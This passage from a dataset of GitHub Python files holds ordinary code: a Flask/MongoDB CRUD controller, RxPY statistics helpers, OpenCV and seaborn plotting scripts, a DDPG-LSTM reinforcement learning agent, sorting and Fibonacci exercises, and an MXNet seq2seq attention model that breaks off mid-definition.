get_room=list(mongo.db.room.find())\n \n for information in get_room:\n information[\"_id\"]= str(information[\"_id\"])\n return Response( \n response = json.dumps(get_room),\n status=200,\n mimetype=\"application/json\"\n )\n \n except Exception as e:\n print (e)\n return Response( response= json.dumps({ \"msg\":\"couldnot retrieve user info\"}),\n status=500,\n mimetype=\"application/json\"\n )\n\n \n @expects_json(room_schema)\n def post(self):\n post_room={ \n \"room_no\":request.json[\"room_no\"],\n \"room_type\":request.json[\"room_type\"],\n \"room_status\":request.json[\"room_status\"],\n \"room_rate\":request.json[\"room_rate\"]\n }\n _post= mongo.db.room.insert_one(post_room)\n\n return Response(\n response = json.dumps({ \"msg\":\"room info created\"}),\n status=200,\n mimetype=\"application/json\"\n\n )\n \n \nclass RoomApi(Resource):\n\n def get(self, id):\n room = mongo.db.room.find_one({'_id': ObjectId(id)})\n resp = Response(dumps(room), mimetype='application/json', status=200)\n return resp\n \n @expects_json(room_schema)\n def patch(self, id):\n try:\n _update = mongo.db.room.update_one(\n {\"_id\":ObjectId(id)},\n {\"$set\":{\"room_no\":request.json[\"room_no\"],\n \"room_type\":request.json[\"room_type\"],\n \"room_status\":request.json[\"room_status\"],\n \"room_rate\":float(request.json[\"room_rate\"])}}\n )\n return Response( response= json.dumps({\"msg\":\"Room info updated successfully\" }),\n status=200,\n mimetype=\"application/json\"\n )\n \n except Exception as e:\n print(e)\n return Response(response= json.dumps({ \"msg\":\"Couldnot update room info\" }),\n status=500,\n mimetype=\"application/json\"\n )\n\n\n def delete(self, id):\n try:\n _delete= mongo.db.room.delete_one({ \"_id\": ObjectId(id) })\n\n return Response( \n response = json.dumps({\"msg\": \"Room info has been deleted\"}),\n status=200,\n mimetype=\"application/json\"\n )\n\n except Exception as e:\n print (e)\n\n return Response( \n response = json.dumps({\"msg\": \"Room info didnot get deleted\"}),\n status=500,\n mimetype=\"application/json\"\n )","repo_name":"dpka09/Crud-with-python","sub_path":"controller/room_controller.py","file_name":"room_controller.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"928503744","text":"import math\nfrom typing import Any\n\nfrom reactivex import Observable\n\n\ndef determine_median(sorted_list):\n if len(sorted_list) == 0:\n raise Exception(\"The input sequence was empty\")\n\n if len(sorted_list) % 2 == 1:\n return sorted_list[int((len(sorted_list) + 1) / 2) - 1]\n else:\n median_1 = sorted_list[int((len(sorted_list) + 1) / 2) - 1]\n median_2 = sorted_list[int((len(sorted_list) + 1) / 2)]\n return float(median_1 + median_2) / 2.0\n\n\ndef median(source: Observable) -> Observable:\n \"\"\"\n Calculates the statistical median on numerical emissions. The sequence must be finite.\n \"\"\"\n return source.to_sorted_list().map(lambda l: determine_median(l))\n\n\ndef mode(source: Observable[Any]) -> Observable[Any]:\n \"\"\"\n Returns the most frequently emitted value (or \"values\" if they have the same number of occurrences).\n The sequence must be finite.\n \"\"\"\n return (\n source.group_by(lambda v: v)\n .flat_map(lambda grp: grp.count().map(lambda ct: (grp.key, ct)))\n .to_sorted_list(lambda t: t[1], reverse=True)\n .flat_map(lambda l: Observable.from_(l).take_while(lambda t: t[1] == l[0][1]))\n .map(lambda t: t[0])\n )\n\n\ndef variance(source: Observable) -> Observable:\n \"\"\"\n Returns the statistical variance of the numerical emissions.\n The sequence must be finite.\n \"\"\"\n squared_values = (\n source.to_list()\n .flat_map(\n lambda l: Observable.from_(l)\n .average()\n .flat_map(lambda avg: Observable.from_(l).map(lambda i: i - avg))\n )\n .map(lambda i: i * i)\n .publish()\n .auto_connect(2)\n )\n\n return Observable.zip(\n squared_values.sum(), squared_values.count(), lambda sum, ct: sum / (ct - 1)\n )\n\n\ndef standard_deviation(source: Observable) -> Observable:\n \"\"\"\n Returns the standard deviation of the numerical emissions:\n The sequence must be finite.\n \"\"\"\n return source.variance().map(lambda i: math.sqrt(i))\n","repo_name":"ReactiveX/RxPY","sub_path":"examples/statistics/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":4581,"dataset":"github-code","pt":"7"} +{"seq_id":"41885978314","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/9/2 16:44\n# @Author : jhys\n# @FileName: 直方图正规化1.py\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n src = cv2.imread(\"child.jpg\", cv2.IMREAD_ANYCOLOR)\n dst = np.zeros_like(src)\n\n cv2.normalize(src, dst, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n\n #计算灰度直方图\n grayHist = cv2.calcHist([src], [0], None, [256], [0, 256])\n grayHist1 = cv2.calcHist([dst], [0], None, [256], [0, 256])\n\n #画出直方图\n x_range = range(256)\n plt.plot(x_range, grayHist, 'r', linewidth=1.5, c='black')\n plt.plot(x_range, grayHist1, 'r', linewidth=1.5, c='b')\n #设置坐标轴的范围\n y_maxValue = np.max(grayHist)\n plt.axis([0, 255, 0, y_maxValue]) #画图范围\n plt.xlabel(\"gray Level\")\n plt.ylabel(\"number of pixels\")\n plt.show()\n\n cv2.imshow(\"src\", src)\n cv2.imshow(\"dst\", dst)\n cv2.waitKey(0)\n cv2.destroyWindow()\n\n","repo_name":"jhyscode/opencv-learning","sub_path":"ch22-直方图变换/直方图正规化1.py","file_name":"直方图正规化1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71370003103","text":"while True:\n\ttry:\t\t\n\t\tqtd = int(input())\n\t\tlista = []\n\t\tfor i in range(qtd):\n\t\t\tnum = (input())\n\t\t\tlista.append(num)\n\t\tlista.sort()\n\t\t#print (lista)\n\t\tcont = 0\n\n\t\tfor i in range(1, qtd):\n\t\t\tn1 = lista[i-1]\n\t\t\tn2 = lista[i]\n\t\t\t#print (n1, n2)\n\t\t\tif (n1[0] == n2[0]):\n\t\t\t\tif (len(n1) > len(n2)):\n\t\t\t\t\ttam = len(n1)\n\t\t\t\telse:\n\t\t\t\t\ttam = len(n2)\n\t\t\t\tj = 0\n\t\t\t\twhile (j < tam and n1[j] == n2[j]):\n\t\t\t\t\tcont = cont + 1\t\t\t\t\t\n\t\t\t\t\tj = j + 1\t\n\t\tprint (cont)\n\texcept:\n\t\tbreak\n","repo_name":"LucasBarbosaRocha/URI","sub_path":"Estruturas/1211.py","file_name":"1211.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21250167923","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\nsns.set_style(\"darkgrid\")\n\ndf = pd.read_csv(\"ibex_35.csv\")\n\ndf = df.dropna()\n\nlog_returns = np.diff(np.log(df[\"Close\"].values))\n\nmu , std = norm.fit(log_returns)\n\nfig , ax = plt.subplots(figsize=(12,8))\nplt.rcParams.update({'font.size': 16})\nret = plt.hist(log_returns , bins = 100 , density = True , color=\"dodgerblue\" , label = \"Empirical Distribution\")\nxmin , xmax = plt.xlim()\n\nx = np.linspace(xmin , xmax , 100)\np = norm.pdf(x , mu , std)\nplt.plot(x , p ,'k' , linewidth=2 , label = \"Gaussian Fit\")\nplt.legend(loc=2)\n\nplt.title(\"IBEX-35 Log Returns Distribution\")\nplt.xlabel(\"$R_{(t)}$\")\n\n\naxins1 = zoomed_inset_axes(ax, zoom = 5, loc=1)\naxins1.hist(log_returns , bins=100 , density = True , color=\"dodgerblue\" , label=\"Fat Tails\")\naxins1.plot(x,p , 'k')\naxins1.legend(loc=1)\nx1, x2, y1, y2 = 0.035,0.060,0.05,2 \naxins1.set_xlim(x1, x2)\naxins1.set_ylim(y1, y2)\nplt.yticks(visible=False)\nmark_inset(ax, axins1, loc1=4, loc2=3, fc=\"none\", ec=\"0.5\")\nplt.savefig(\"gaussian_distributionibex.pdf\")\n","repo_name":"XabierGA/Ising_Econophysics","sub_path":"Data/distribution_returns.py","file_name":"distribution_returns.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73155098462","text":"from starlite import Starlite, CORSConfig\n\nfrom controllers.index import TestController\nfrom controllers.locations import LocationController\n\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n\nload_dotenv(find_dotenv())\n\nFRONTEND_URL: str\nif os.getenv(\"ENVIRONMENT\") == \"development\":\n FRONTEND_URL = os.getenv(\"DEV_FRONTEND_URL\")\nelse:\n FRONTEND_URL = os.getenv(\"PROD_FRONTEND_URL\")\n\napp = Starlite(\n route_handlers=[TestController, LocationController],\n cors_config=CORSConfig(\n allow_origins=[FRONTEND_URL],\n allow_methods=[\"GET\", \"POST\", \"PUT\", \"DELETE\"],\n allow_headers=[\"*\"],\n )\n)\n","repo_name":"foosh123/Your-Travel-Planner","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42034194779","text":"import tensorflow as tf\nimport numpy as np\nimport numpy.random as nr\nimport gym\nimport time, copy\nfrom coflowgym.algo.ddpg import OUNoise, DDPG\n\n############################### DDPG with LSTM ####################################\n\nclass DDPG_LSTM(object):\n ##################### hyper parameters ####################\n LR_A = 0.001 # learning rate for actor, default is 0.001\n LR_C = 0.002 # learning rate for critic, default is 0.002\n GAMMA = 0.9 # reward discount, default to 0.9\n TAU = 0.01 # soft replacement, default to 0.01\n MEMORY_CAPACITY = 10000 # default to 10000\n BATCH_SIZE = 32\n\n ##################### success config ##############\n # LR_A = 0.001\n # LR_C = 0.0001\n # GAMMA = 0.9 \n # TAU = 0.001 \n # MEMORY_CAPACITY = 10000 \n # BATCH_SIZE = 32\n\n def __init__(self, a_dim, s_dim, a_bound, time_sequence=10, lstm_dim=128,GAMMA=0.9):\n # (s, s', a, r)\n self.memory = np.zeros((self.MEMORY_CAPACITY, s_dim * time_sequence * 2 + a_dim + 1), dtype=np.float32)\n self.pointer = 0\n self.sess = tf.Session()\n\n self.time_sequence = time_sequence\n self.lstm_dim = lstm_dim\n self.GAMMA = GAMMA\n self.update_every = 1\n\n self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,\n self.S = tf.placeholder(tf.float32, [None, self.time_sequence, s_dim], 's')\n self.S_ = tf.placeholder(tf.float32, [None, self.time_sequence, s_dim], 's_')\n self.R = tf.placeholder(tf.float32, [None, 1], 'r')\n\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, scope='eval', trainable=True)\n a_ = self._build_a(self.S_, scope='target', trainable=False)\n with tf.variable_scope('Critic'):\n # assign self.a = a in memory when calculating q for td_error,\n # otherwise the self.a is from Actor when updating Actor\n q = self._build_c(self.S, self.a, scope='eval', trainable=True)\n q_ = self._build_c(self.S_, a_, scope='target', trainable=False)\n\n # networks parameters\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n\n # target net replacement\n self.soft_replace = [tf.assign(t, (1 - self.TAU) * t + self.TAU * e)\n for t, e in zip(self.at_params + self.ct_params, self.ae_params + self.ce_params)]\n\n q_target = self.R + self.GAMMA * q_\n # in the feed_dic for the td_error, the self.a should change to actions in memory\n td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)\n self.ctrain = tf.train.AdamOptimizer(self.LR_C).minimize(td_error, var_list=self.ce_params)\n tf.summary.scalar(\"td_error\", td_error)\n\n a_loss = - tf.reduce_mean(q) # maximize the q\n self.atrain = tf.train.AdamOptimizer(self.LR_A).minimize(a_loss, var_list=self.ae_params)\n tf.summary.scalar(\"a_loss\", a_loss)\n\n self.merged = tf.summary.merge_all()\n self.writer = tf.summary.FileWriter(\"tf_log/\", self.sess.graph)\n self.sess.run(tf.global_variables_initializer())\n\n def choose_action(self, s):\n actions = self.sess.run(self.a, {self.S: s[np.newaxis, :]})\n # print(\"actions: \", actions)\n return actions[0]\n\n def learn(self):\n # soft target replacement\n self.sess.run(self.soft_replace)\n\n for _ in range(self.update_every):\n indices = np.random.choice(self.MEMORY_CAPACITY, size=self.BATCH_SIZE)\n bt = self.memory[indices, :]\n bs = bt[:, :self.s_dim*self.time_sequence]\n ba = bt[:, self.s_dim*self.time_sequence: self.s_dim*self.time_sequence + self.a_dim]\n br = bt[:, -self.s_dim*self.time_sequence - 1: -self.s_dim*self.time_sequence]\n bs_ = bt[:, -self.s_dim*self.time_sequence:]\n bs = bs.reshape(-1, self.time_sequence, self.s_dim)\n bs_ = bs_.reshape(-1, self.time_sequence, self.s_dim)\n\n self.sess.run(self.atrain, {self.S: bs})\n self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n summary = self.sess.run(self.merged, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n self.writer.add_summary(summary, self.pointer)\n\n def store_transition(self, s, a, r, s_):\n # print(s.reshape(1, -1).shape, a.shape, r, s_.reshape(1,-1).shape)\n transition = np.hstack((s.reshape(-1), a, [r], s_.reshape(-1)))\n index = self.pointer % self.MEMORY_CAPACITY # replace the old memory with new memory\n self.memory[index, :] = transition\n self.pointer += 1\n\n def _build_a(self, s, scope, trainable):\n with tf.variable_scope(scope):\n ## add LSTM\n hidden_units1 = 100\n # lstm_cell1 = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_units1)\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.lstm_dim)\n multi_lstm = tf.contrib.rnn.MultiRNNCell(cells=[lstm_cell])\n # init_state = multi_lstm.zero_state(batch_size=self.BATCH_SIZE, dtype=tf.float32)\n outputs, _ = tf.nn.dynamic_rnn(cell=multi_lstm, inputs=s, dtype=tf.float32)\n lstm_h = outputs[:, -1, :]\n\n n_l1 = 600\n n_l2 = 600\n # net1 = tf.layers.dense(s, n_l1, activation=tf.nn.relu, name='l1', trainable=trainable)\n w1 = tf.get_variable(\"w1\", [self.lstm_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable(\"b1\", [1, n_l1], trainable=trainable)\n net1 = tf.nn.relu(tf.matmul(lstm_h, w1) + b1)\n ## BN\n # net1 = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(s, w1) + b1, training=True, name=\"BN_1\"))\n w2 = tf.get_variable('w2', [n_l1, n_l2], trainable=trainable)\n b2 = tf.get_variable('b2', [1, n_l2], trainable=trainable)\n net = tf.nn.relu(tf.matmul(net1, w2) + b2)\n ## BN\n # net = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(net1, w2) + b2, training=True, name=\"BN_2\"))\n a = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)\n\n # tf.summary.histogram(scope+\"/w1\", w1)\n # tf.summary.histogram(scope+\"/b1\", b1)\n # tf.summary.histogram(scope+\"/w2\", w2)\n # tf.summary.histogram(scope+\"/b2\", b2)\n return tf.multiply(a, self.a_bound, name='scaled_a')\n\n def _build_c(self, s, a, scope, trainable):\n with tf.variable_scope(scope):\n ## add LSTM\n hidden_units1 = 128\n # lstm_cell1 = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_units1)\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.lstm_dim)\n multi_lstm = tf.contrib.rnn.MultiRNNCell(cells=[lstm_cell])\n # init_state = multi_lstm.zero_state(batch_size=self.BATCH_SIZE, dtype=tf.float32)\n outputs, _ = tf.nn.dynamic_rnn(cell=multi_lstm, inputs=s, dtype=tf.float32)\n lstm_h = outputs[:, -1, :]\n\n n_l1 = 600\n n_l2 = 600\n w1_s = tf.get_variable('w1_s', [self.lstm_dim, n_l1], trainable=trainable)\n w1_a = tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)\n data = tf.matmul(lstm_h, w1_s) + tf.matmul(a, w1_a) + b1\n ## BN\n # data = tf.layers.batch_normalization(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1, training=True, name=\"BN_1\")\n net1 = tf.nn.relu(data)\n w2 = tf.get_variable('w2', [n_l1, n_l2], trainable=trainable)\n b2 = tf.get_variable('b2', [1, n_l2], trainable=trainable)\n net = tf.nn.relu(tf.matmul(net1, w2) + b2)\n ## BN\n # net = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(net1, w2) + b2, training=True, name=\"BN_2\"))\n\n # tf.summary.histogram(scope+\"/w1_s\", w1_s)\n # tf.summary.histogram(scope+\"/w1_a\", w1_a)\n # tf.summary.histogram(scope+\"/b1\", b1)\n # tf.summary.histogram(scope+\"/w2\", w2)\n # tf.summary.histogram(scope+\"/b2\", b2)\n return tf.layers.dense(net, 1, trainable=trainable) # Q(s,a)\n \n def save(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.save(self.sess, filename)\n \n def load(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(self.sess, filename)\n\n############################### training ####################################\n############################### A Demo ####################################\nMAX_EPISODES = 2000\nMAX_EP_STEPS = 200 # default is 200\nRENDER = False\nENV_NAME = 'Pendulum-v0'\nA_BOUND = 2\n\n# RENDER = True\nMAX_EP_STEPS = 300\nENV_NAME = \"MountainCarContinuous-v0\"\nA_BOUND = 1\n\nEXPLORE = 70\npre_trained = False\n\ndef train():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = np.array([np.float64(A_BOUND)])\n print(a_bound, env.action_space.high, env.action_space.low)\n time_sequence = 20\n\n oun = OUNoise(a_dim, mu=0.4)\n\n ddpg = DDPG_LSTM(a_dim, s_dim, a_bound, time_sequence)\n\n if pre_trained:\n ddpg.load('./log/model.ckpt')\n\n var = 3 # control exploration\n t1 = time.time()\n ave_rs = []\n his_step = []\n\n epsilon = 1\n for episode in range(1, 1+MAX_EPISODES):\n s = env.reset()\n ep_reward = 0\n oun.reset()\n epsilon -= (epsilon/EXPLORE)\n ## record state in one episode\n last_s = [[0]*s_dim]*(time_sequence-1)\n last_s.append(s)\n\n for j in range(MAX_EP_STEPS):\n if RENDER:\n env.render()\n\n # # get state sequence [st-3, st-2, st-1, st]\n # ep_s.append(s)\n # if len(ep_s) >= time_sequence:\n # ts = ep_s[-time_sequence:]\n # else:\n # ts = [[0]*s_dim]*(time_sequence-len(ep_s))\n # ts.extend(ep_s)\n\n # Add exploration noise\n action_original = ddpg.choose_action(np.array(last_s))\n # a = 2*a-1 ## for sigmoid\n # a = np.clip(np.random.normal(action_original, var), -1*a_bound[0], a_bound[0]) # add randomness to action selection for exploration\n a = action_original+max(0.01, epsilon)*oun.noise()\n s_, r, done, _ = env.step(a)\n # print(\"step:\", j, s, r, a)\n\n last_s_ = last_s.copy()\n del last_s_[0]\n last_s_.append(s_)\n ddpg.store_transition(np.array(last_s), a, r, np.array(last_s_))\n # print(\"last_s:\", last_s)\n # print(\"last_s_:\", last_s_)\n last_s = last_s_\n\n if ddpg.pointer > ddpg.BATCH_SIZE:\n if ddpg.pointer % 1 == 0:\n var *= .9995 # decay the action randomness\n ddpg.learn()\n if ddpg.pointer == (ddpg.BATCH_SIZE+1):\n print(\"Begin learning...\")\n\n # s = s_\n ep_reward += r\n if j == MAX_EP_STEPS-1 or done:\n his_step.append(j)\n print(\"episode\", episode, \"consume\", j, \"steps, epsilon =\", epsilon,\"var = \", var, \"ep_reward:\", ep_reward)\n break\n if episode % 20 == 0:\n t_steps, t_rewards = test(env, ddpg)\n print(\"in test: average consume %s steps and ep_rewards is %s!\"%(t_steps, t_rewards))\n if ENV_NAME == \"MountainCarContinuous-v0\" and t_steps < 180:\n ddpg.save(\"./log/model.ckpt\")\n break\n if ENV_NAME == 'Pendulum-v0' and t_rewards > -150:\n ddpg.save(\"./log/model.ckpt\")\n break\n # sys.stdout.flush()\n print('Running time: ', time.time() - t1)\n\ndef test(env, agent):\n TEST_EPISODE = 10\n ep_steps = 0\n test_reward = 0\n time_sequence = agent.time_sequence\n for _ in range(TEST_EPISODE):\n s = env.reset()\n last_s = [[0]*agent.s_dim]*(agent.time_sequence-1)\n last_s.append(s)\n for t in range(MAX_EP_STEPS):\n # env.render()\n a = agent.choose_action(np.array(last_s))\n s, r, done, _ = env.step(a)\n last_s.append(s)\n del last_s[0]\n test_reward += r\n if t == MAX_EP_STEPS-1 or done:\n # print(\"in test: consume %s steps!\"%(t))\n ep_steps += t\n break\n return ep_steps//TEST_EPISODE, test_reward//TEST_EPISODE\n\nif __name__ == \"__main__\":\n \n train()\n pass","repo_name":"chentianba/coflowgym","sub_path":"coflowgym/algo/ddpg_lstm.py","file_name":"ddpg_lstm.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"15076808918","text":"import random\n\n\ndef Merge(left, right):\n merge_list = list()\n left_idx, right_idx = 0, 0\n\n # case 1 : left, right 둘 다 존재할 경우\n while len(left) > left_idx and len(right) > right_idx:\n if left[left_idx] < right[right_idx]:\n merge_list.append(left[left_idx])\n left_idx += 1\n else:\n merge_list.append(right[right_idx])\n right_idx += 1\n\n # case 2 : left혹은 right만 존재할 경우\n while len(left) > left_idx:\n merge_list.append(left[left_idx])\n left_idx += 1\n\n while len(right) > right_idx:\n merge_list.append(right[right_idx])\n right_idx += 1\n\n return merge_list\n\n\ndef Merge_Sort(data):\n if len(data) <= 1:\n return data\n med = len(data) // 2\n left = Merge_Sort(data[:med])\n right = Merge_Sort(data[med:])\n return Merge(left, right)\n\n\nMS = random.sample(range(0, 1000), 100)\nMS = Merge_Sort(MS)\nprint(MS)\n","repo_name":"Jungho-Cheon/algorithm-python","sub_path":"Solutions/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28972079180","text":"# 1. 재귀함수 활용.\ndef fib(n):\n global cnt1 # 밑에서 써야해서 global로 선언\n \n cnt1 += 1\n if (n == 1 or n == 2): # n이 1이나 2일때는 실행횟수가 늘어나지 않는다.\n cnt1 -= 1 # cnt += 1 해준걸 cnt -= 1로 다시 원래대로 돌려 놓는다.\n return 1 # 문제에서 제시한대로 그냥 옮겨 적은 것 뿐\n else: \n return (fib(n - 1) + fib(n - 2)) # 문제에서 제시한대로 그냥 옮겨 적은 것 뿐\n\n# 2. dp(동적프로그래밍)활용\ndef fibonacci(n):\n global cnt2 # 밑에서 써야해서 global로 선언\n\n # 피보나치 dp 식대로 그대로 적음\n dp = [0] * (n+1)\n dp[1] = 1\n dp[2] = 1\n \n for i in range(3, n+1):\n dp[i] = dp[i-1] + dp[i-2]\n cnt2 += 1\n return dp[n]\n# 3. 출력부분\nn = int(input()) # n 받아서\ncnt1 = 0 # cnt 초기화\ncnt2 = 0 # cnt 초기화\nfib(n) # 재귀함수로 작동\nfibonacci(n) # dp로 작동\nprint(cnt1+1, cnt2) # 재귀함수 실행횟수, dp 실행횟수 출력. 재귀함수는 자기자신을 부르는 거라서 +1","repo_name":"wjsrlahrlco1998/Coding-Test-Study","sub_path":"KiiiimDong/[BOJ]_알고리즘_수업-피보나치_수_1/[BOJ]_알고리즘_수업-피보나치_수_1.py","file_name":"[BOJ]_알고리즘_수업-피보나치_수_1.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"39148271172","text":"import collections\nimport io\nimport mxnet as mx\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.contrib import text\nfrom mxnet.gluon import data as gdata, loss as gloss, nn, rnn\n\n\nPAD = ''\nBOS = ''\nEOS = ''\n\n\nnum_epochs = 500\neval_interval = 1\nlr = 0.01\nbatch_size = 20\nmax_seq_len = 50\nmax_test_output_len = 50\nencoder_num_layers = 1\ndecoder_num_layers = 2\nencoder_drop_prob = 0.1\ndecoder_drop_prob = 0.1\nencoder_embed_size = 256\nencoder_num_hiddens = 256\ndecoder_num_hiddens = 256\nalignment_size = 25\n\nctx = mx.gpu(0)\n\n\ndef read_data(max_seq_len):\n input_tokens = []\n output_tokens = []\n input_seqs = []\n output_seqs = []\n with io.open('story_word.txt') as f:\n lines = f.readlines()\n for line in lines:\n input_seq, output_seq = line.rstrip().split('\\t')\n cur_input_tokens = input_seq.split(' ')\n cur_output_tokens = output_seq.split(' ')\n if len(cur_input_tokens) < max_seq_len and \\\n len(cur_output_tokens) < max_seq_len:\n input_tokens.extend(cur_input_tokens)\n # 句末附上 EOS 符号。\n cur_input_tokens.append(EOS)\n # 添加 PAD 符号使每个序列等长(长度为 max_seq_len)。\n while len(cur_input_tokens) < max_seq_len:\n cur_input_tokens.append(PAD)\n input_seqs.append(cur_input_tokens)\n output_tokens.extend(cur_output_tokens)\n cur_output_tokens.append(EOS)\n while len(cur_output_tokens) < max_seq_len:\n cur_output_tokens.append(PAD)\n output_seqs.append(cur_output_tokens)\n fr_vocab = text.vocab.Vocabulary(collections.Counter(input_tokens),\n reserved_tokens=[PAD, BOS, EOS])\n en_vocab = text.vocab.Vocabulary(collections.Counter(output_tokens),\n reserved_tokens=[PAD, BOS, EOS])\n return fr_vocab, en_vocab, input_seqs, output_seqs\n\n\ninput_vocab, output_vocab, input_seqs, output_seqs = read_data(max_seq_len)\nfr = nd.zeros((len(input_seqs), max_seq_len), ctx=ctx)\nen = nd.zeros((len(output_seqs), max_seq_len), ctx=ctx)\nfor i in range(len(input_seqs)):\n fr[i] = nd.array(input_vocab.to_indices(input_seqs[i]), ctx=ctx)\n en[i] = nd.array(output_vocab.to_indices(output_seqs[i]), ctx=ctx)\ndataset = gdata.ArrayDataset(fr, en)\n\n\n\nclass Encoder(nn.Block):\n def __init__(self, num_inputs, embed_size, num_hiddens, num_layers,\n drop_prob, **kwargs):\n super(Encoder, self).__init__(**kwargs)\n with self.name_scope():\n self.embedding = nn.Embedding(num_inputs, embed_size)\n self.dropout = nn.Dropout(drop_prob)\n self.rnn = rnn.GRU(num_hiddens, num_layers, dropout=drop_prob,\n input_size=embed_size)\n\n def forward(self, inputs, state):\n embedding = self.embedding(inputs).swapaxes(0, 1)\n embedding = self.dropout(embedding)\n output, state = self.rnn(embedding, state)\n return output, state\n\n def begin_state(self, *args, **kwargs):\n return self.rnn.begin_state(*args, **kwargs)\n\n\nclass Decoder(nn.Block):\n def __init__(self, num_hiddens, num_outputs, num_layers, max_seq_len,\n drop_prob, alignment_size, encoder_num_hiddens, **kwargs):\n super(Decoder, self).__init__(**kwargs)\n self.max_seq_len = max_seq_len\n self.encoder_num_hiddens = encoder_num_hiddens\n self.hidden_size = num_hiddens\n self.num_layers = num_layers\n with self.name_scope():\n self.embedding = nn.Embedding(num_outputs, num_hiddens)\n self.dropout = nn.Dropout(drop_prob)\n # 注意力机制。\n self.attention = nn.Sequential()\n with self.attention.name_scope():\n self.attention.add(\n nn.Dense(alignment_size,\n in_units=num_hiddens + encoder_num_hiddens,\n activation='tanh', flatten=False))\n self.attention.add(nn.Dense(1, in_units=alignment_size,\n flatten=False))\n\n self.rnn = rnn.GRU(num_hiddens, num_layers, dropout=drop_prob,\n input_size=num_hiddens)\n self.out = nn.Dense(num_outputs, in_units=num_hiddens,\n flatten=False)\n self.rnn_concat_input = nn.Dense(\n num_hiddens, in_units=num_hiddens + encoder_num_hiddens,\n flatten=False)\n\n def forward(self, cur_input, state, encoder_outputs):\n # 当循环神经网络有多个隐藏层时,取最靠近输出层的单层隐藏状态。\n single_layer_state = [state[0][-1].expand_dims(0)]\n encoder_outputs = encoder_outputs.reshape((self.max_seq_len, -1,\n self.encoder_num_hiddens))\n hidden_broadcast = nd.broadcast_axis(single_layer_state[0], axis=0,\n size=self.max_seq_len)\n encoder_outputs_and_hiddens = nd.concat(encoder_outputs,\n hidden_broadcast, dim=2)\n energy = self.attention(encoder_outputs_and_hiddens)\n batch_attention = nd.softmax(energy, axis=0).transpose((1, 2, 0))\n batch_encoder_outputs = encoder_outputs.swapaxes(0, 1)\n decoder_context = nd.batch_dot(batch_attention, batch_encoder_outputs)\n input_and_context = nd.concat(\n nd.expand_dims(self.embedding(cur_input), axis=1),\n decoder_context, dim=2)\n concat_input = self.rnn_concat_input(input_and_context).reshape(\n (1, -1, 0))\n concat_input = self.dropout(concat_input)\n state = [nd.broadcast_axis(single_layer_state[0], axis=0,\n size=self.num_layers)]\n output, state = self.rnn(concat_input, state)\n output = self.dropout(output)\n output = self.out(output).reshape((-3, -1))\n return output, state\n\n def begin_state(self, *args, **kwargs):\n return self.rnn.begin_state(*args, **kwargs)\n\nclass DecoderInitState(nn.Block):\n def __init__(self, encoder_num_hiddens, decoder_num_hiddens, **kwargs):\n super(DecoderInitState, self).__init__(**kwargs)\n with self.name_scope():\n self.dense = nn.Dense(decoder_num_hiddens,\n in_units=encoder_num_hiddens,\n activation=\"tanh\", flatten=False)\n\n def forward(self, encoder_state):\n return [self.dense(encoder_state)]\n\ndef 